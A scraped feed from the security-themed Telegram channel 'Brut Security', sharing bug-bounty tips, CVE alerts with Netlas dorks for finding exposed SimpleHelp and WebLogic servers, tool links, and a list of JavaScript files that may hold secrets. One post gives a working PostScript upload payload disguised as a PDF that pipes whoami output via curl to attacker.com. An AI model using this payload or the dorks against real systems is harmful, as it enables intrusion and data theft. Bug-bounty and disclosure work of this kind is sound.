Brut Security
15.9K subscribers
1.06K photos
92 videos
300 files
1.14K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
Brut Security
ATM Security Assessment Checklist.xlsx
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”–Top 25 JavaScript path files used to store sensitive information in Web Application⬇️

01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯35❀11πŸ‘7🐳2
CVE-2024-57726, -57727, -57728: Multiple vulnerabilities in SimpleHelp, 7.2 - 8.8 rating❗️

The vulnerabilities allow attackers to upload arbitrary files to the SimpleHelp server, as well as escalate privileges, which together allows RCE to be carried out.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/Frx6H
πŸ‘‰ Dork: http.headers.server:"SimpleHelp"

Vendor's advisory: https://simple-help.com/kb---security-vulnerabilities-01-2025#
πŸ‘6
Add the endpoint to your SSRF wordlist
❀14
⚑️Smart contract security report. It contains 2 High, 6 Medium & 8 Low severity issues.

βœ…
https://github.com/gkrastenov/audits/blob/main/solo/SpartaDex-Security-Review.md
❀9πŸ‘2
πŸ—Ώ17
πŸ‘14
Does anyone have Aura+ Songs Playlist ? Do Drop in Comments! Thank You.
🀨4πŸ—Ώ4
β˜„οΈRCE On PDF Upload: https://hackerone.com/reports/403417

Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"Content-Type: application/pdf

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl
http://attacker.com/?a=$(whoami|base64) ).putdeviceparams
quit
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯8πŸ‘1
⚑WayBackup Finder - A passive way to find backups/ sensitive information.
⚠️https://github.com/anmolksachan/WayBackupFinder
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘9❀1
A Visual Guide to Recon
πŸ”₯5πŸ‘1
CVE-2025-21535: Server Takeover in Oracle WebLogic, 9.8 rating πŸ”₯

An easily exploitable vulnerability in the Core component allows an unauthenticated attacker to remotely compromise a WebLogic server.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/6EpWK
πŸ‘‰ Dork: protocol:t3 OR protocol:t3s

Vendor's advisory: https://www.oracle.com/security-alerts/cpujan2025.html#AppendixFMW
πŸ‘6🫑1
β˜„οΈHExHTTP - HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.

⚠️https://github.com/c0dejump/HExHTTP
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘11πŸ”₯5❀3
▢️Explore Bug Bounty POC Videos: https://t.me/brutsecurity_poc
Please open Telegram to view this post
VIEW IN TELEGRAM
Brut Security pinned «▢️Explore Bug Bounty POC Videos: https://t.me/brutsecurity_pocΒ»
πŸ‘8❀3
New Business Logic POC Video Shared -https://t.me/brutsecurity_poc/9
πŸ”₯4❀1